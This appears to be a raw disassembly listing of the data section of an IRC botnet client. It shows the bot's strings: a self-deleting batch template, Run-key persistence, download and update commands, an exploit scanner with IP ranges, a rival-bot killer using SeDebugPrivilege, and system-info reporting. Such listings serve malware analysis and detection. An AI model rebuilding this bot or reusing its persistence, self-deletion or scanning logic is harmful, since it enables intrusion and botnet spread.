aQue? db 'Que?',0 ; DATA XREF: sub_418552+C7�o
align 10h
; char aHttp1_1501NotI[]
aHttp1_1501NotI db 'HTTP/1.1 501 Not Implemented',0Dh,0Ah ; DATA XREF: sub_418552+10F�o
db 'Content-Length: %d',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
; char aSSSS[]
aSSSS db '%s\%s\%s%s',0 ; DATA XREF: sub_418552+229�o
align 4
; char aSSS_2[]
aSSS_2 db '%s\%s\%s',0 ; DATA XREF: sub_418552+1F2�o
align 10h
; char aSS_8[]
aSS_8 db '%s\%s',0 ; DATA XREF: sub_418552+25A�o
align 4
; char aQue?_1[]
aQue?_1 db 'Que?',0 ; DATA XREF: sub_418552+3A8�o
align 10h
; char aQue?_0[]
aQue?_0 db 'Que?',0 ; DATA XREF: sub_418552+2BE�o
align 4
; char aHttp1_1200OkCo[]
aHttp1_1200OkCo db 'HTTP/1.1 200 ok',0Dh,0Ah ; DATA XREF: sub_418552+3FC�o
db 'Content-Length: %d',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 4
; char aHttpTransferD_[]
aHttpTransferD_ db 'HTTP: Transfer: %d.%d.%d.%d (N/A). %d Total Sends.',0
; DATA XREF: sub_418552+51D�o
align 4
; char aHttpTransfer_0[]
aHttpTransfer_0 db 'HTTP: Transfer: %d.%d.%d.%d (%s). %d Total Sends.',0
; DATA XREF: sub_418552+54A�o
align 4
; char asc_42049C[]
asc_42049C db 0Dh,0Ah,0 ; DATA XREF: sub_4184BF+11�o
align 10h
; char asc_4204A0[]
asc_4204A0: ; DATA XREF: sub_4184BF:loc_4184EB�o
unicode 0, < >,0
; char asc_4204A4[]
asc_4204A4: ; DATA XREF: sub_4184BF+3D�o
unicode 0, < >,0
; char asc_4204A8[]
asc_4204A8: ; DATA XREF: sub_4184BF+54�o
unicode 0, < >,0
; char asc_4204AC[]
asc_4204AC db 0Dh,0Ah ; DATA XREF: sub_4184BF+78�o
db 0Dh,0Ah,0
align 4
; char asc_4204B4[]
asc_4204B4 db '%x',0 ; DATA XREF: sub_418396+CA�o
align 4
aBadAllocati_16 db 'bad allocation',0
align 4
; char aS_16[]
aS_16 db '%s',0 ; DATA XREF: sub_41B7F9+74�o
align 4
; char aSX[]
aSX db '%s%X',0 ; DATA XREF: sub_41B7F9+EC�o
align 4
aBadAllocati_17 db 'bad allocation',0
align 4
; char a[]
a@echoOff1DelSI db '@echo off',0Dh,0Ah ; DATA XREF: sub_4190BD+7E�o
db ':1',0Dh,0Ah
db 'del "%s"',0Dh,0Ah
db 'if exist "%s" goto 1',0Dh,0Ah
db 'del "%%0"',0Dh,0Ah,0
align 10h
; char aSTmpIIICCC_bat[]
aSTmpIIICCC_bat db '%s\tmp-%i%i%i-%c%c%c.bat',0 ; DATA XREF: sub_4190BD+FC�o
align 4
; char Mode[]
Mode: ; DATA XREF: sub_4190BD+110�o
unicode 0, <w>,0
; char aS_14[]
aS_14 db '%s',0 ; DATA XREF: sub_4190BD+12B�o
align 4
aRegistryMonito db 'Registry Monitor',0 ; DATA XREF: sub_419477+D9�o
align 4
aSoftwareMicr_3 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_419477+12A�o
align 4
aQuitSYouKill_0 db 'QUIT :%s YOU KILLED ME :<',0Dh,0Ah,0
; char aQuitSYouKilled[]
aQuitSYouKilled db 'QUIT :%s YOU KILLED ME :< --UPDATED',0Dh,0Ah,0
; DATA XREF: sub_419477+15A�o
align 4
aRemoveAuthenti db 'Remove: Authentication Failed.',0
align 4
; char aD_D_D_D_0[]
aD_D_D_D_0 db '%d.%d.%d.%d',0 ; DATA XREF: sub_418FC6+4E�o
aVis db 'VIS',0 ; DATA XREF: sub_418E51+42�o
a2k3 db '2K3',0 ; DATA XREF: sub_418E51+55�o
aXp db 'XP',0 ; DATA XREF: sub_418E51+62�o
align 4
a2k db '2K',0 ; DATA XREF: sub_418E51+6E�o
align 4
aMe db 'ME',0 ; DATA XREF: sub_418E51+81�o
align 4
a98 db '98',0 ; DATA XREF: sub_418E51+8E�o
align 10h
aNt db 'NT',0 ; DATA XREF: sub_418E51+A0�o
align 4
a95 db '95',0 ; DATA XREF: sub_418E51+AD�o
align 4
; char aUnk[]
aUnk db 'UNK',0 ; DATA XREF: sub_418E51:loc_418F05�o
; char aOsMicrosoftWin[]
aOsMicrosoftWin db '[OS: Microsoft Windows %s %s (%i.%i build %i)]',0
; DATA XREF: sub_418E51+108�o
align 4
; char aS_13[]
aS_13 db '%s',0 ; DATA XREF: sub_418E51+13A�o
align 10h
a192_168__ db '192.168.*.*',0 ; DATA XREF: sub_419347+32�o
a10___ db '10.*.*.*',0 ; DATA XREF: sub_419347+46�o
align 4
a111___ db '111.*.*.*',0 ; DATA XREF: sub_419347+5A�o
align 4
a15___ db '15.*.*.*',0 ; DATA XREF: sub_419347+6E�o
align 10h
a16___ db '16.*.*.*',0 ; DATA XREF: sub_419347+82�o
align 4
a101___ db '101.*.*.*',0 ; DATA XREF: sub_419347+96�o
align 4
a110___ db '110.*.*.*',0 ; DATA XREF: sub_419347+A6�o
align 4
a112___ db '112.*.*.*',0 ; DATA XREF: sub_419347+B6�o
align 10h
a170_65__ db '170.65.*.*',0 ; DATA XREF: sub_419347+C6�o
align 4
; char a172_D__[]
a172_D__ db '172.%d.*.*',0 ; DATA XREF: sub_419347+E0�o
align 4
aBadAllocati_18 db 'bad allocation',0
align 4
aBadAllocati_19 db 'bad allocation',0
align 4
aMessageboxa_0 db 'MessageBoxA',0 ; DATA XREF: sub_419677+12�o
aUser32_dll_0 db 'user32.dll',0 ; DATA XREF: sub_419677+17�o
align 10h
dword_420700 dd 0D010Fh, 0C3000000h, 0 ; DATA XREF: sub_4195EC+19�o
aBadAllocati_20 db 'bad allocation',0
align 4
aBadAllocati_21 db 'bad allocation',0
align 4
; char aSC_0[]
aSC_0 db '%s%c',0 ; DATA XREF: sub_4196D1+55�o
align 4
aBadAllocati_22 db 'bad allocation',0
align 4
aWinlogon_exe db 'winlogon.exe',0 ; DATA XREF: sub_419EA0+3C�o
align 4
aSvchost_exe db 'svchost.exe',0 ; DATA XREF: sub_419EA0+44�o
aServices_exe db 'services.exe',0 ; DATA XREF: sub_419EA0+4C�o
align 10h
aOpenthread db 'OpenThread',0 ; DATA XREF: sub_419EA0+5F�o
align 4
aKernel32_dll_1 db 'kernel32.dll',0 ; DATA XREF: sub_419EA0+64�o
align 4
aOpenprocess db 'OpenProcess',0 ; DATA XREF: sub_419EA0+78�o
aKernel32_dll_2 db 'kernel32.dll',0 ; DATA XREF: sub_419EA0+7D�o
align 4
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0 ; DATA XREF: sub_419EA0+8C�o
align 4
aKernel32_dll_3 db 'kernel32.dll',0 ; DATA XREF: sub_419EA0+91�o
align 4
aProcess32first db 'Process32First',0 ; DATA XREF: sub_419EA0+A0�o
align 4
aKernel32_dll_4 db 'kernel32.dll',0 ; DATA XREF: sub_419EA0+A5�o
align 4
aProcess32next db 'Process32Next',0 ; DATA XREF: sub_419EA0+B4�o
align 4
aKernel32_dll_5 db 'kernel32.dll',0 ; DATA XREF: sub_419EA0+B9�o
align 4
aModule32first db 'Module32First',0 ; DATA XREF: sub_419EA0+C8�o
align 4
aKernel32_dll_6 db 'kernel32.dll',0 ; DATA XREF: sub_419EA0+CD�o
align 4
aModule32next db 'Module32Next',0 ; DATA XREF: sub_419EA0+DC�o
align 4
aKernel32_dll_7 db 'kernel32.dll',0 ; DATA XREF: sub_419EA0+E1�o
align 4
aThread32first db 'Thread32First',0 ; DATA XREF: sub_419EA0+F0�o
align 4
aKernel32_dll_8 db 'kernel32.dll',0 ; DATA XREF: sub_419EA0+F5�o
align 4
aThread32next db 'Thread32Next',0 ; DATA XREF: sub_419EA0+104�o
align 4
aKernel32_dll_9 db 'kernel32.dll',0 ; DATA XREF: sub_419EA0+109�o
align 4
aReadprocessmem db 'ReadProcessMemory',0 ; DATA XREF: sub_419EA0+118�o
align 4
aKernel32_dl_10 db 'kernel32.dll',0 ; DATA XREF: sub_419EA0+11D�o
align 4
aGetmodulefilen db 'GetModuleFileNameExA',0 ; DATA XREF: sub_419EA0+12C�o
align 10h
aPsapi_dll db 'psapi.dll',0 ; DATA XREF: sub_419EA0+131�o
align 4
; char aSS_11[]
aSS_11 db '%s\%s',0 ; DATA XREF: sub_419EA0+1F5�o
align 4
aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_419EA0+2BE�o
align 4
aSedebugprivi_0 db 'SeDebugPrivilege',0 ; DATA XREF: sub_419EA0+365�o
align 4
; char aSystem[]
aSystem db 'System',0 ; DATA XREF: sub_419EA0+390�o
align 4
; char aBotKilledS[]
aBotKilledS db 'Bot Killed: %s',0 ; DATA XREF: sub_419EA0+451�o
align 4
aSoftwareMicr_4 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_419A9F+36�o
align 4
aSoftwareMicr_5 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',0
; DATA XREF: sub_419A9F+3D�o
align 4
aSoftwareMicr_6 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx',0
; DATA XREF: sub_419A9F+44�o
aSoftwareMicr_7 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices',0
; DATA XREF: sub_419A9F+4B�o
align 4
aSystemControls db 'SYSTEM\ControlSet001\Services\Eventlog\System',0
; DATA XREF: sub_419C6D+26�o
align 4
; char aSS_10[]
aSS_10 db '%s\%s',0 ; DATA XREF: sub_419C6D+E4�o
align 4
; char aLdm[]
aLdm db 'LDM',0 ; DATA XREF: sub_419C6D+118�o
aNetdde db 'NetDDE',0 ; DATA XREF: sub_419C6D+12B�o
align 4
aEventmessagefi db 'EventMessageFile',0 ; DATA XREF: sub_419C6D+142�o
align 4
aBadAllocati_23 db 'bad allocation',0
align 4
aListTTooLong db 'list<T> too long',0 ; DATA XREF: sub_40121E+2B�o
; sub_4016BA+2B�o
align 10h
dd offset dword_420E80
off_420A74 dd offset nullsub_2 ; DATA XREF: sub_41BB84+23�o
; char aS_19[]
aS_19 db '%s',0 ; DATA XREF: sub_40177B+EB�o
; sub_4019F3+EB�o ...
align 4
aE db '-e',0 ; DATA XREF: sub_40177B+1D5�o
align 10h
a1_0: ; DATA XREF: sub_40177B+1E7�o
unicode 0, <1>,0
aDl_0 db 'DL',0 ; DATA XREF: sub_40177B+23F�o
; sub_4019F3+1F1�o
align 4
aDlAuthFailure_ db 'DL: Auth Failure.',0 ; DATA XREF: sub_40177B:loc_4019C8�o
align 4
; char aDlInvalidArgum[]
aDlInvalidArgum db 'DL: Invalid Arguments',0 ; DATA XREF: sub_40177B:loc_4019D5�o
align 4
aUpdAuthFailure db 'UPD: Auth Failure.',0 ; DATA XREF: sub_4019F3:loc_401BF2�o
align 4
; char aUpdInvalidArgu[]
aUpdInvalidArgu db 'UPD: Invalid Arguments.',0 ; DATA XREF: sub_4019F3:loc_401BFF�o
dd offset dword_421030
off_420AE4 dd offset sub_40177B ; DATA XREF: sub_41C370+4A�o
; .data:off_433C58�o
dd offset dword_420FE4
off_420AEC dd offset sub_4019F3 ; DATA XREF: sub_41C370+66�o
; .data:off_433C54�o
; char aHttpSDS[]
aHttpSDS db 'http://%s:%d/%s',0 ; DATA XREF: sub_401C1D+77�o
dd offset dword_42107C
off_420B04 dd offset sub_401C1D ; DATA XREF: sub_41C370+82�o
; .data:off_433C5C�o
; char aSystemSCpuIXS[]
aSystemSCpuIXS@ db 'System: %s [CPU: %i x %s @ %dMhz] [RAM: %iMB/%iMB] [Country: %s] '
; DATA XREF: sub_401CC0+185�o
db '[IP: %s] [User: %s] [System Dir: %s] [Uptime: %I64ud %I64uh %I64u'
db 'm]',0
align 10h
; char aNetIpSHostNA[]
aNetIpSHostNA db 'Net: IP: %s Host: N/A',0 ; DATA XREF: sub_401E82+55�o
align 4
; char aNetIpSHostS[]
aNetIpSHostS db 'Net: IP: %s Host: %s',0 ; DATA XREF: sub_401E82+73�o
align 10h
dd offset dword_421114
off_420BC4 dd offset sub_401CC0 ; DATA XREF: sub_41C370+9E�o
; .data:off_433C60�o
dd offset dword_4210C8
off_420BCC dd offset sub_401E82 ; DATA XREF: sub_41C370+BA�o
; .data:off_433C64�o
; char aScanUnknownExp[]
aScanUnknownExp db 'Scan: Unknown Exploit.',0 ; DATA XREF: sub_401F1C:loc_402001�o
align 4
a____0 db '*.*.*.*',0 ; DATA XREF: sub_401F1C+107�o
aA db '-a',0 ; DATA XREF: sub_401F1C+146�o
align 4
aB db '-b',0 ; DATA XREF: sub_401F1C+155�o
align 4
aC db '-c',0 ; DATA XREF: sub_401F1C+164�o
align 4
; char aScanNotEnoughT[]
aScanNotEnoughT db 'Scan: Not Enough Threads. %d Available.',0 ; DATA XREF: sub_401F1C+1AE�o
; char aD_D_D_D_1[]
aD_D_D_D_1 db '%d.%d.%d.%d',0 ; DATA XREF: sub_401F1C+228�o
; sub_401F1C+365�o
; char aX_[]
aX_ db 'x.',0 ; DATA XREF: sub_401F1C+23F�o
align 4
; char aD_[]
aD_ db '%d.',0 ; DATA XREF: sub_401F1C+253�o
; char aSx_[]
aSx_ db '%sx.',0 ; DATA XREF: sub_401F1C+26B�o
align 10h
; char aSD_[]
aSD_ db '%s%d.',0 ; DATA XREF: sub_401F1C+266�o
align 4
; char aSx[]
aSx db '%sx',0 ; DATA XREF: sub_401F1C+2C8�o
; char aSD[]
aSD db '%s%d',0 ; DATA XREF: sub_401F1C+2DD�o
align 4
; char aD_x_x_x[]
aD_x_x_x db '%d.x.x.x',0 ; DATA XREF: sub_401F1C+3BE�o
align 10h
; char aD_D_x_x[]
aD_D_x_x db '%d.%d.x.x',0 ; DATA XREF: sub_401F1C+3A7�o
align 4
; char aD_D_D_x[]
aD_D_D_x db '%d.%d.%d.x',0 ; DATA XREF: sub_401F1C+38D�o
align 4
; char aScanSDUsingDTh[]
aScanSDUsingDTh db 'Scan: %s:%d Using %d Threads.',0 ; DATA XREF: sub_401F1C+408�o
align 4
aScanner db 'Scanner',0 ; DATA XREF: sub_401F1C+4E8�o
; sub_40243A+42�o
; char aScanAllScanThr[]
aScanAllScanThr db 'Scan: All Scan Threads Stopped. %d killed.',0
; DATA XREF: sub_40243A+BF�o
align 4
; char aStatisticsExpl[]
aStatisticsExpl db 'Statistics: Exploits:',0 ; DATA XREF: sub_40251A+3B�o
align 4
; char aSSD[]
aSSD db '%s %s: %d',0 ; DATA XREF: sub_40251A+62�o
align 10h
; char aSDaemons[]
aSDaemons db '%s; Daemons:',0 ; DATA XREF: sub_40251A+84�o
align 10h
; char aSTftpD[]
aSTftpD db '%s TFTP: %d',0 ; DATA XREF: sub_40251A+9A�o
; char aSHttpD[]
aSHttpD db '%s HTTP: %d',0 ; DATA XREF: sub_40251A+B0�o
dd offset dword_4211F8
off_420D1C dd offset sub_401F1C ; DATA XREF: sub_41C370+E4�o
; .data:off_433C74�o
dd offset dword_4211AC
off_420D24 dd offset sub_40243A ; DATA XREF: sub_41C370+100�o
; .data:off_433C6C�o
dd offset dword_421160
off_420D2C dd offset sub_40251A ; DATA XREF: sub_41C370+11C�o
; .data:off_433C70�o
dbl_420D30 dq 5.0e-1 ; DATA XREF: sub_41A9DE:loc_41AF68�r
flt_420D38 dd 4.2949673e9 ; DATA XREF: sub_41A9DE+584�r
align 10h
dd 48h, 0Eh dup(0)
dd offset dword_423064
dd offset dword_421250
dd 10h
dword_420D88 dd 3 dup(0) ; DATA XREF: .rdata:0041D334�o
dd offset off_423008
dd offset dword_420D9C
dword_420D9C dd 2 dup(0) ; DATA XREF: .rdata:00420D98�o
dd 3, 420DACh, 420DBCh, 420F48h, 420F94h, 0
dd offset off_423008
dd 2, 0
dd 0FFFFFFFFh, 0
dd 40h, 420D9Ch
dword_420DD8 dd 3 dup(0) ; DATA XREF: .rdata:0041D368�o
dd offset off_425958
dd offset dword_420FB0
dword_420DEC dd 3 dup(0) ; DATA XREF: .rdata:0041D388�o
dd offset off_423030
dd offset dword_420E00
dword_420E00 dd 2 dup(0) ; DATA XREF: .rdata:00420DFC�o
dd 1, 420E10h, 420E18h, 0
dd offset off_423030
dd 2 dup(0)
dd 0FFFFFFFFh, 0
dd 40h, 420E00h
dword_420E34 dd 3 dup(0) ; DATA XREF: .rdata:0041DC20�o
dd offset off_423E50
dd offset dword_420E48
dword_420E48 dd 2 dup(0) ; DATA XREF: .rdata:00420E44�o
dd 2, 420E58h, 420E64h, 420F94h, 0
dd offset off_423E50
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 420E48h
dword_420E80 dd 3 dup(0) ; DATA XREF: .rdata:00420A70�o
dd offset off_425900
dd offset dword_420E94
dword_420E94 dd 2 dup(0) ; DATA XREF: .rdata:00420E90�o
dd 1, 420EA4h, 420EACh, 0
dd offset off_425900
dd 2 dup(0)
dd 0FFFFFFFFh, 0
dd 40h, 420E94h
dword_420EC8 dd 3 dup(0) ; DATA XREF: .rdata:0041D328�o
dd offset off_425918
dd offset dword_420EDC
dword_420EDC dd 2 dup(0) ; DATA XREF: .rdata:00420ED8�o
dd 3, 420EECh, 420EFCh, 420F48h, 420F94h, 0
dd offset off_425918
dd 2, 0
dd 0FFFFFFFFh, 0
dd 40h, 420EDCh
dword_420F18 dd 3 dup(0) ; DATA XREF: .rdata:0041D31C�o
dd offset off_425938
dd offset dword_420F2C
dword_420F2C dd 2 dup(0) ; DATA XREF: .rdata:00420F28�o
dd 2, 420F3Ch, 420F48h, 420F94h, 0
dd offset off_425938
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 420F2Ch
dword_420F64 dd 3 dup(0) ; DATA XREF: .rdata:0041D310�o
dd offset off_425974
dd offset dword_420F78
dword_420F78 dd 2 dup(0) ; DATA XREF: .rdata:00420F74�o
dd 2, 420F88h, 420FC8h, 420F94h, 0
dd offset off_425958
align 10h
dd 0FFFFFFFFh, 0
dd 40h, 420FB0h
dword_420FB0 dd 2 dup(0) ; DATA XREF: .rdata:00420DE8�o
dd 1, 420FC0h, 420F94h, 0
dd offset off_425974
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 420F78h
dword_420FE4 dd 3 dup(0) ; DATA XREF: .rdata:00420AE8�o
dd offset off_425990
dd offset dword_420FF8
dword_420FF8 dd 2 dup(0) ; DATA XREF: .rdata:00420FF4�o
dd 2, 421008h, 421014h, 420EACh, 0
dd offset off_425990
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 420FF8h
dword_421030 dd 3 dup(0) ; DATA XREF: .rdata:00420AE0�o
dd offset off_4259A8
dd offset dword_421044
dword_421044 dd 2 dup(0) ; DATA XREF: .rdata:00421040�o
dd 2, 421054h, 421060h, 420EACh, 0
dd offset off_4259A8
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 421044h
dword_42107C dd 3 dup(0) ; DATA XREF: .rdata:00420B00�o
dd offset off_4259BC
dd offset dword_421090
dword_421090 dd 2 dup(0) ; DATA XREF: .rdata:0042108C�o
dd 2, 4210A0h, 4210ACh, 420EACh, 0
dd offset off_4259BC
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 421090h
dword_4210C8 dd 3 dup(0) ; DATA XREF: .rdata:00420BC8�o
dd offset off_4259D8
dd offset dword_4210DC
dword_4210DC dd 2 dup(0) ; DATA XREF: .rdata:004210D8�o
dd 2, 4210ECh, 4210F8h, 420EACh, 0
dd offset off_4259D8
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 4210DCh
dword_421114 dd 3 dup(0) ; DATA XREF: .rdata:00420BC0�o
dd offset off_4259F4
dd offset dword_421128
dword_421128 dd 2 dup(0) ; DATA XREF: .rdata:00421124�o
dd 2, 421138h, 421144h, 420EACh, 0
dd offset off_4259F4
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 421128h
dword_421160 dd 3 dup(0) ; DATA XREF: .rdata:00420D28�o
dd offset off_425A10
dd offset dword_421174
dword_421174 dd 2 dup(0) ; DATA XREF: .rdata:00421170�o
dd 2, 421184h, 421190h, 420EACh, 0
dd offset off_425A10
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 421174h
dword_4211AC dd 3 dup(0) ; DATA XREF: .rdata:00420D20�o
dd offset off_425A2C
dd offset dword_4211C0
dword_4211C0 dd 2 dup(0) ; DATA XREF: .rdata:004211BC�o
dd 2, 4211D0h, 4211DCh, 420EACh, 0
dd offset off_425A2C
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 4211C0h
dword_4211F8 dd 3 dup(0) ; DATA XREF: .rdata:00420D18�o
dd offset off_425A48
dd offset dword_42120C
dword_42120C dd 2 dup(0) ; DATA XREF: .rdata:00421208�o
dd 2, 42121Ch, 421228h, 420EACh, 0
dd offset off_425A48
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 42120Ch, 3 dup(0)
dword_421250 dd 42C4h, 43C9h, 6640h, 8658h, 0EB68h, 1C1D3h, 1C1EEh
; DATA XREF: .rdata:00420D80�o
dd 1C209h, 1C22Ch, 1C24Fh, 1C274h, 1C299h, 1C2BCh, 1C2E1h
dd 1C313h, 1C348h, 0
dword_421294 dd 2 dup(0) ; DATA XREF: sub_40B042+2�o
; sub_40B042+7�o
dword_42129C dd 0 ; DATA XREF: sub_40B066+2�o
; sub_40B066+7�o
dword_4212A0 dd 0 ; DATA XREF: sub_4026B9+29�o
dd offset sub_40264D
dd 0
dd offset dword_4212DC
dd 0FFFFFFFFh, 41C1CBh
dword_4212B8 dd 19930522h, 1, 4212B0h, 5 dup(0) ; DATA XREF: .text:0041C1E4�o
dd 1
dword_4212DC dd 3, 4212ECh, 421940h, 42195Ch, 0 ; DATA XREF: .rdata:004212AC�o
dd offset off_423008
align 8
dd 0FFFFFFFFh, 0
dd 28h, 4026F8h
dword_421308 dd 0FFFFFFFEh, 0 ; DATA XREF: __msize+2�o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset $LN16
align 8
dword_421328 dd 0FFFFFFFEh, 0 ; DATA XREF: __onexit+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset $LN7
align 8
dword_421348 dd 0FFFFFFFEh, 0 ; DATA XREF: __fsopen+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset $LN12_0
align 8
dword_421368 dd 0FFFFFFFEh, 0 ; DATA XREF: _fprintf+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset $LN18
align 8
dword_421388 dd 0FFFFFFFEh, 0 ; DATA XREF: _fclose+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset $LN13_2
align 8
dword_4213A8 dd 0FFFFFFFEh, 0 ; DATA XREF: _free+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset $LN14
align 8
dword_4213C8 dd 0FFFFFFFEh, 0 ; DATA XREF: _V6_HeapAlloc+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset $LN8_1
align 8
dword_4213E8 dd 0FFFFFFFEh, 0 ; DATA XREF: _fread_s+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset $LN15_0
align 8
dword_421408 dd 0FFFFFFFEh, 0 ; DATA XREF: ___tmainCRTStartup+2�o
dd 0FFFFFF80h, 0
dd 0FFFFFFFEh, 4040FFh, 404103h, 0FFFFFFFEh, 4040C5h, 4040D9h
dword_421430 dd 0FFFFFFFEh, 0 ; DATA XREF: ___updatetmbcinfo+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset $LN18_0
align 10h
dword_421450 dd 0FFFFFFFEh, 0 ; DATA XREF: __setmbcp+2�o
dd 0FFFFFFCCh, 0
dd 0FFFFFFFEh, 0
dd offset $LN27
align 10h
dword_421470 dd 0FFFFFFFEh, 0 ; DATA XREF: ___updatetlocinfo+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset $LN11_2
align 10h
dword_421490 dd 0FFFFFFFEh, 0 ; DATA XREF: __initptd+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset $LN9_1
align 10h
dword_4214B0 dd 0FFFFFFFEh, 0 ; DATA XREF: _freefls(x)+2�o
dd 0FFFFFFD8h, 0
dd 0FFFFFFFEh, 0
dd offset $LN27_0
dd 0FFFFFFFEh, 0
dd offset $LN28_0
dword_4214D8 dd 0FFFFFFFEh, 0 ; DATA XREF: __mtinitlocknum+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset $LN14_2
align 8
dword_4214F8 dd 0FFFFFFFEh, 0 ; DATA XREF: _doexit+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset $LN27_1
align 8
dword_421518 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_407F55+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_407FBC
align 8
dword_421538 dd 0FFFFFFFEh, 0 ; DATA XREF: __getstream+2�o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset $LN25
align 8
dword_421558 dd 0FFFFFFFEh, 0 ; DATA XREF: __ioinit+2�o
dd 0FFFFFF8Ch, 0
dd 0FFFFFFFEh, 408A09h, 408A0Dh, 0
dword_421578 dd 0FFFFFFFEh, 0 ; DATA XREF: __close+2�o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset $LN14_4
align 8
dword_421598 dd 0FFFFFFFEh, 0 ; DATA XREF: _flsall+2�o
dd 0FFFFFFCCh, 0
dd 0FFFFFFFEh, 0
dd offset $LN20_2
dd 2 dup(0)
dd offset $LN31
dword_4215C0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40A34F+2�o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40A421
align 10h
dword_4215E0 dd 0FFFFFFFEh, 0 ; DATA XREF: ___FrameUnwindToState+2�o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset $LN29
align 10h
dd offset $LN28_1
dd offset $LN21_0
dword_421608 dd 0FFFFFFFEh, 0 ; DATA XREF: ___DestructExceptionObject+2�o
dd 0FFFFFFD8h, 0
dd 0FFFFFFFEh, 40B405h, 40B40Eh, 40h, 2 dup(0)
dd offset unknown_libname_102 ; Microsoft VisualC 2-8/net runtime
dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 3 dup(0)
dd 2 dup(1), 421624h
dword_421658 dd 19930522h, 2, 421634h, 1, 421644h, 3 dup(0) ; DATA XREF: .text:0041C1FF�o
dd 1, 0
dword_421680 dd 0FFFFFFFEh, 0 ; DATA XREF: CallCatchBlock(EHExceptionRecord *,EHRegistrationNode *,_CONTEXT *,_s_FuncInfo const *,void *,int,ulong)+2�o
dd 0FFFFFFB4h, 0
dd 0FFFFFFFEh, 0
dd offset $LN27_2
align 10h
dd offset $LN26_2
dd offset $LN19_4
dword_4216A8 dd 0FFFFFFFEh, 0 ; DATA XREF: ___BuildCatchObjectHelper+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 40B804h, 40B808h, 0
dword_4216C8 dd 0FFFFFFFEh, 0 ; DATA XREF: ___BuildCatchObject+2�o
dd 0FFFFFFD8h, 0
dd 0FFFFFFFEh, 40B89Dh, 40B8A1h
dword_4216E4 dd 0 ; DATA XREF: unknown_libname_104+162�o
dd offset sub_40B1CF
align 10h
dd offset dword_4216F4
dword_4216F4 dd 2, 421700h, 42195Ch, 0 ; DATA XREF: .rdata:004216F0�o
dd offset off_423E50
dd 0
dd 0FFFFFFFFh, 0
dd 0Ch, 40BD5Dh, 0
dword_421720 dd 0FFFFFFFEh, 0 ; DATA XREF: terminate(void)+2�o
dd 0FFFFFFD8h, 0
dd 0FFFFFFFEh, 40BE79h, 40BE7Dh, 0
dword_421740 dd 0FFFFFFFEh, 0 ; DATA XREF: _inconsistency(void)+2�o
dd 0FFFFFFD8h, 0
dd 0FFFFFFFEh, 40BEC9h, 40BECDh, 0
dword_421760 dd 0FFFFFFFEh, 0 ; DATA XREF: ___crtInitCritSecAndSpinCount+2�o
dd 0FFFFFFCCh, 0
dd 0FFFFFFFEh, 40CB9Ah, 40CBB1h, 0
dword_421780 dd 0FFFFFFFEh, 0 ; DATA XREF: __IsNonwritableInCurrentImage+2�o
dd 0FFFFFFD8h, 0
dd 0FFFFFFFEh, 40CC98h, 40CCACh, 0
dword_4217A0 dd 0FFFFFFFEh, 0 ; DATA XREF: __lseeki64+2�o
dd 0FFFFFFCCh, 0
dd 0FFFFFFFEh, 0
dd offset $LN14_7
align 10h
dword_4217C0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40D420+2�o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40D4F2
align 10h
dword_4217E0 dd 0FFFFFFFEh, 0 ; DATA XREF: __calloc_impl+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset $LN37_0
align 10h
dword_421800 dd 0FFFFFFFEh, 0 ; DATA XREF: _realloc+2�o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset $LN66
align 10h
dword_421820 dd 0FFFFFFFEh, 0 ; DATA XREF: unknown_libname_119+2�o
dd 0FFFFFFC0h, 0
dd 0FFFFFFFEh, 0
dd offset unknown_libname_123 ; Microsoft VisualC 2-8/net runtime
align 10h
